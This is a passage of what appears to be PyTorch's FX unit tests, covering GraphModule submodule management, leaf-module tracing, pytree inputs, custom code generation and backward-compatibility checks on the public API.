dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
self.assertEqual(len(w), 0)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def test_delete_unused_submodules_leaf(self):
class SubModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(10, 10)
self.relu = torch.nn.ReLU()
def forward(self, x):
x = self.linear(x)
x = self.relu(x)
return x
class Model(torch.nn.Module):
def __init__(self):
super().__init__()
self.submod = SubModule()
def forward(self, x):
x = self.submod(x)
return x
model = Model()
class MyCustomTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return module_qualified_name == "submod"
inputs = torch.randn(1, 10)
traced_graph = MyCustomTracer().trace(model)
gm2 = torch.fx.GraphModule(model, traced_graph)
gm2.delete_all_unused_submodules()
torch.testing.assert_allclose(gm2(inputs), model(inputs))
def test_fx_stateless(self):
class MockModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.l1 = torch.nn.Linear(1, 1)
self.register_buffer('buffer', torch.ones(1))
def forward(self, x):
return self.l1(x) + self.buffer
module = MockModule()
x = torch.rand((1, 1))
weight = torch.tensor([[1.0]], requires_grad=True)
bias = torch.tensor([0.0], requires_grad=True)
buffer = torch.tensor([0.0])
parameters = {'l1.weight': weight,
'l1.bias': bias,
'buffer': buffer}
fx_module = torch.fx.symbolic_trace(module)
res = _stateless.functional_call(fx_module, parameters, x)
res.backward()
self.assertIsNotNone(weight.grad)
self.assertIsNotNone(bias.grad)
self.assertIsNone(buffer.grad)
# Gradients were not calculated for the module's own parameters and buffers
self.assertIsNone(module.l1.weight.grad)
self.assertIsNone(module.l1.bias.grad)
self.assertIsNone(module.buffer.grad)
def test_tracing_graphmodules_as_leaf_submodules(self):
class A(torch.nn.Module):
def forward(self, t):
return t + t
class B(torch.nn.Module):
def __init__(self):
super(type(self), self).__init__()
self.calling = False
self.called = False
def forward(self, t):
if self.calling:
return t - t
else:
return t + t
def __call__(self, *args):
self.called = True
self.calling = True
return super(type(self), self).__call__(*args)
self.calling = False
class M(torch.nn.Module):
def __init__(self, a, b):
super().__init__()
self.a = a
self.b = b
def forward(self, t):
x = self.a(t)
y = self.b(t)
return x + y
class LeafTracer(Tracer):
def is_leaf_module(self, module, name):
return True
class LeafTracerNotB(Tracer):
def is_leaf_module(self, module, name):
return False if "b" in name else True
# Recompile calls added "for fun", since they
# chain __call__ wrappers.
#
# Test: B as a regular, non-leaf module
#
a = symbolic_trace(A())
a.recompile()
m = M(a, B())
graph = LeafTracerNotB().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is not treated as leaf.
self.assertFalse(hasattr(gm, "b"))
# Test that the custom __call__ on submodule b was honored.
match = [
n
for n in gm.graph.nodes
if n.op == "call_function" and n.target == operator.sub
]
self.assertTrue(len(match) == 1)
#
# Test: B as a regular, leaf module
# symbolic_trace should only patch torch.nn.Module.__call__,
# which means B.__call__ should still execute
#
a = symbolic_trace(A())
a.recompile()
b = B()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is leaf:
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
# Test b.__call__ was run
self.assertTrue(b.called)
self.assertTrue(gm.get_submodule("b").called)
#
# Test: B as GraphModule leaf
# __call__ not honored since symbolic_trace directly invokes forward()
#
a = symbolic_trace(A())
a.recompile()
b = symbolic_trace(B())
b.recompile()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
def test_annotations_empty_tuple(self):
class Foo(torch.nn.Module):
def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
return "foo"
traced = torch.fx.symbolic_trace(Foo())
x = ()
y = ("bar", ())
traced(x, y)
FileCheck().check("_Tuple[()]") \
.check("typing_Tuple[str,typing_Tuple[()]]") \
.run(traced.code)
scripted = torch.jit.script(traced)
scripted(x, y)
FileCheck().check("Tuple[()]") \
.check("Tuple[str, Tuple[()]]") \
.run(scripted.code)
@unittest.skipIf(IS_WINDOWS, "Python Windows bug? https://bugs.python.org/issue45108")
def test_assert(self):
def f(x):
assert x > 1
return x + 1
try:
torch.fx.proxy.TracerBase.trace_asserts = True
traced = symbolic_trace(f)
finally:
torch.fx.proxy.TracerBase.trace_asserts = False
self.assertEqual(f(2), traced(2))
with self.assertRaises(AssertionError):
traced(0)
def test_pytree(self):
def f_sum(x):
return sum(x)
def f_sum_dict(x):
out = 0
for k, v in x.items():
out += v
return out
def f_dict_list_map(x):
new_dict = {}
for k, v in x.items():
new_dict[k] = [i + 1 for i in v]
return new_dict
def f_dict_add(x):
return x['a'] + sum(x['z'])
def f_namedtuple_add(x):
return x.x + x.y
pytree._register_pytree_node(
Foo,
lambda x: ([x.a, x.b], None),
lambda x, _: Foo(x[0], x[1]),
)
fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])
def f_custom(x):
return x.a + x.b
def f_custom_dict(x):
return f_sum_dict(x.a) + x.b
def f_return_custom(x):
return Foo(x.b, x.a)
tests = [
(f_sum, [PH, PH, PH]),
(f_sum, []),
(f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
(f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
(f_dict_list_map, {5: (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': []}),
(f_custom, Foo(PH, PH)),
(f_custom, Foo(PH, 3)),
(f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
# (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees
(f_namedtuple_add, Point(PH, PH)),
]
def verify_pytree(f, inp):
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
orig_out = f(val)
nf = symbolic_trace(f, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
bare_fx = GraphModule({}, copy.deepcopy(nf.graph))
bare_fx.graph.set_codegen(CodeGen())
bare_fx.recompile()
self.assertEqual(nf.graph.process_outputs(bare_fx(*nf.graph.process_inputs(val))), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
nf = symbolic_trace(nf)
self.assertEqual(nf(val), orig_out)
assert "tree_flatten_spec" not in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)
nf = symbolic_trace(nf, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
pickled = pickle.dumps(nf)
nf = pickle.loads(pickled)
self.assertEqual(nf(val), orig_out)
for f, inp in tests:
verify_pytree(f, inp)
def test_pytree_concrete(self):
def f(b, a):
if b:
return a['a']
else:
return a['z']
inp = {'a': {'a': PH, 'z': PH}, 'b': True}
nf = symbolic_trace(f, concrete_args=inp)
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
self.assertEqual(nf(**val), f(**val))
nf = symbolic_trace(nf)
self.assertEqual(nf(**val), f(**val))
def test_custom_codegen(self):
class ListCodeGen(CodeGen):
def gen_fn_def(self, free_vars, maybe_return_annotation):
lst_unpack = f"""
def forward(self, args_list: List[torch.Tensor]){maybe_return_annotation}:
{', '.join(free_vars)} = args_list"""
return lst_unpack
def additional_globals(self):
return [('List', typing.List)]
def process_inputs(self, *inputs):
assert(len(inputs) == 1)
return inputs[0]
def f(a, b):
return a + b
nf = symbolic_trace(f)
vals = [torch.randn(3), torch.randn(3)]
self.assertEqual(nf(*vals), f(*vals))
nf.graph.set_codegen(ListCodeGen())
nf.recompile()
bare_fx = GraphModule({}, copy.deepcopy(nf.graph))
bare_fx.graph.set_codegen(CodeGen())
bare_fx.recompile()
self.assertEqual(nf(vals), f(*vals))
self.assertEqual(nf.graph.process_outputs(bare_fx(*nf.graph.process_inputs(vals))), f(*vals))
ts_f = torch.jit.script(nf)
self.assertEqual(nf(vals), ts_f(vals))
def test_custom_codegen_with_transformer(self):
class ListCodeGen(CodeGen):
def gen_fn_def(self, free_vars, maybe_return_annotation):
lst_unpack = f"""
def forward(self, args_list: List[torch.Tensor]){maybe_return_annotation}:
{', '.join(free_vars)} = args_list"""
return lst_unpack
def additional_globals(self):
return [('List', typing.List)]
def process_inputs(self, *inputs):
assert(len(inputs) == 1)
return inputs[0]
def f(a, b):
return a + b
nf = symbolic_trace(f)
vals = [torch.randn(3), torch.randn(3)]
self.assertEqual(nf(*vals), f(*vals))
nf.graph.set_codegen(ListCodeGen())
nf.recompile()
self.assertEqual(nf(vals), f(*vals))
transformed_gm = Transformer(nf).transform()
self.assertEqual(nf(vals), transformed_gm(vals))
def test_interpreter_with_codegen(self):
class ListCodeGen(CodeGen):
def gen_fn_def(self, free_vars, maybe_return_annotation):
lst_unpack = f"""
def forward(self, args_list: List[torch.Tensor]){maybe_return_annotation}:
{', '.join(free_vars)} = args_list"""
return lst_unpack
def additional_globals(self):
return [('List', typing.List)]
def process_inputs(self, *inputs):
assert(len(inputs) == 1)
return inputs[0]
def generate_output(self, output_args):
return f'return list({repr(output_args)})'
def process_outputs(self, outputs):
return list(outputs)
def f(a, b):
a = a + b
b = a + b
return a, b
nf = symbolic_trace(f)
vals = [torch.randn(3), torch.randn(3)]
nf.graph.set_codegen(ListCodeGen())
nf.recompile()
self.assertEqual(Interpreter(nf).run(vals), nf(vals))
def test_imul_code_print(self):
graph = torch.fx.Graph()
a = graph.placeholder("a")
b = graph.placeholder("b")
graph.call_function(operator.imul, (a, b), {})
graph.output(a)
gm = torch.fx.GraphModule({}, graph)
gm.recompile()
self.assertEqual(gm(2, 3), 6)
self.assertIn("a *= b", gm.code)
def run_getitem_target():
from torch.fx._symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
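# Verifies that get_signature_for_torch_op returns at least one schema for every builtin
# torch op in op_db, and that some schema can bind each of the op's sample inputs.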
class TestOperatorSignatures(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature-flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
if not isinstance(op.op, types.BuiltinFunctionType):
raise unittest.SkipTest("This path doesn't work on Python functions")
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
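# Backward-compatibility guard for the public FX API: signatures of functions and the public
# members of classes marked @compatibility(is_backward_compatible=True) are serialized to
# stable strings and compared against checked-in expect files.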
class TestFXAPIBackwardCompatibility(JitTestCase):
def setUp(self):
super().setUp()
self.maxDiff = None
# Checking for mutable operations while tracing is feature-flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
super().tearDown()
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def _fn_to_stable_annotation_str(self, obj):
"""
Unfortunately we have to serialize function signatures manually since
serialization for `inspect.Signature` objects is not stable across
python versions
"""
fn_name = torch.typename(obj)
signature = inspect.signature(obj)
sig_str = f'{fn_name}{signature}'
arg_strs = []
for k, v in signature.parameters.items():
maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\
if v.annotation is not inspect.Signature.empty else ''
def default_val_str(val):
if isinstance(val, (tuple, list)):
str_pieces = ['(' if isinstance(val, tuple) else '[']
str_pieces.append(', '.join(default_val_str(v) for v in val))
if isinstance(val, tuple) and len(str_pieces) == 2:
str_pieces.append(',')
str_pieces.append(')' if isinstance(val, tuple) else ']')
return ''.join(str_pieces)
# Need to fix up some default value strings.
# First case: modules. Default module `repr` contains the FS path of the module.
# Don't leak that
if isinstance(val, types.ModuleType):
return f'<module {val.__name__}>'
# Second case: callables. Callables (such as lambdas) encode their address in
# their string repr. Don't do that
if callable(val):
return f'<function {val.__name__}>'
return str(val)
if v.default is not inspect.Signature.empty:
default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'"
maybe_default = f' = {default_val_str}'
else:
maybe_default = ''
maybe_stars = ''
if v.kind == inspect.Parameter.VAR_POSITIONAL:
maybe_stars = '*'
elif v.kind == inspect.Parameter.VAR_KEYWORD:
maybe_stars = '**'
arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}')
return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\
if signature.return_annotation is not inspect.Signature.empty else ''
return f'{fn_name}({", ".join(arg_strs)}){return_annot}'
def _annotation_type_to_stable_str(self, t, sig_str):
if t is inspect.Signature.empty:
return ''
# Forward ref
if isinstance(t, str):
return f"'{t}'"
if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef):
return t.__forward_arg__
if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef):
return t.__forward_arg__
trivial_mappings = {
str : 'str',
int : 'int',
float: 'float',
bool: 'bool',
torch.dtype: 'torch.dtype',
torch.Tensor: 'torch.Tensor',
torch.device: 'torch.device',
torch.memory_format: 'torch.memory_format',
slice: 'slice',
torch.nn.Module: 'torch.nn.modules.module.Module',
torch.fx.Graph : 'torch.fx.graph.Graph',
torch.fx.Node : 'torch.fx.node.Node',
torch.fx.Proxy : 'torch.fx.proxy.Proxy',
torch.fx.node.Target : 'torch.fx.node.Target',
torch.fx.node.Argument : 'torch.fx.node.Argument',
torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode',
torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule',
torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match',
Ellipsis : '...',
typing.Any: 'Any',
type(None): 'NoneType',
None: 'None',
typing.Iterator: 'Iterator',
}
mapping = trivial_mappings.get(t, None)
if mapping:
return mapping
# Handle types with contained types
contained = getattr(t, '__args__', None) or []
# Callables contain a bare List for arguments
contained = t if isinstance(t, list) else contained
# Python 3.8 puts type vars into __args__ for unbound types such as Dict
if all(isinstance(ct, typing.TypeVar) for ct in contained):
contained = []
contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained]
contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else ''
origin = getattr(t, '__origin__', None)
if origin is None:
# Unbound types don't have `__origin__` in some Python versions, so fix that up here.
origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin
if origin in {tuple, typing.Tuple}:
return f'Tuple{contained_type_str}'
if origin in {typing.Union}:
# Annoying hack to detect Optional
if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)):
not_none_param = contained[0] if contained[0] is not type(None) else contained[1]
return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]'
return f'Union{contained_type_str}'
if origin in {dict, typing.Dict}:
return f'Dict{contained_type_str}'
if origin in {list, typing.List}:
return f'List{contained_type_str}'
if origin in {type, typing.Type}:
return f'Type{contained_type_str}'
if isinstance(t, typing.Callable):
if len(contained) > 0 and contained[0] is not Ellipsis:
return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]'
else:
return f'Callable{contained_type_str}'
raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}.'
f'Please add support for this type and confirm with the '
f'FX team that your signature change is valid.')
def test_function_back_compat(self):
"""
Test backward compatibility for function signatures with
@compatibility(is_backward_compatible=True). Currently this checks for
exact signature matches, which may lead to false positives. If this
becomes too annoying, we can refine this check to actually parse out
the saved schema strings and check if the change is truly backward-
incompatible.
"""
signature_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if not isinstance(obj, type):
signature_strs.append(self._fn_to_stable_annotation_str(obj))
signature_strs.sort()
try:
self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \
f"as backwards-compatible has experienced a signature change. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_class_member_back_compat(self):
"""
Test backward compatibility for members of classes with
@compatibility(is_backward_compatible=True). Currently this checks for
exact matches on the publicly visible members of the class.
"""
class_method_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if isinstance(obj, type):
public_members = [name for name in obj.__dict__ if not name.startswith('_')]
class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}')
class_method_strs.sort()
try:
self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \
f"as backwards-compatible has experienced change in its public members. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_public_api_surface(self):
non_back_compat_objects = {}
def check_symbols_have_bc_designation(m, prefix):
if not m.__name__.startswith('torch.fx'):
return
if m.__name__.startswith('torch.fx.experimental'):
return
for k, v in m.__dict__.items():
if v is m:
continue
if k.startswith('_'):
continue
if isinstance(v, types.ModuleType):
check_symbols_have_bc_designation(v, prefix + [k])
elif isinstance(v, type) or isinstance(v, types.FunctionType):
if v not in _MARKED_WITH_COMATIBLITY:
non_back_compat_objects.setdefault(v)
check_symbols_have_bc_designation(torch.fx, ['torch', 'fx'])
check_symbols_have_bc_designation(torch.fx.passes, ['torch', 'fx', 'passes'])
non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()]
# Only want objects in torch.fx
non_back_compat_strs = [
s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')]
# Only want objects in public namespaces
non_back_compat_strs = [
s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))]
non_back_compat_strs.sort()
if len(non_back_compat_strs) != 0:
raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a "
f"backwards-compatibility classification! Please decorate these "
f"API(s) with `@torch.fx._compatibility.compatibility` to specify "
f"BC guarantees.")
class TestFunctionalTracing(JitTestCase):
def setUp(self):
super().setUp()
# Checking for mutable operations while tracing is feature-flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
super().tearDown()
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
MUTABLE = (RuntimeError, r"Tried to trace mutable operation")
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"bilinear": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"native_channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"gelu": BUILT_IN_FUNC,
"hardshrink": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"linear": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pairwise_distance": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"prelu": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": CONTROL_FLOW,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
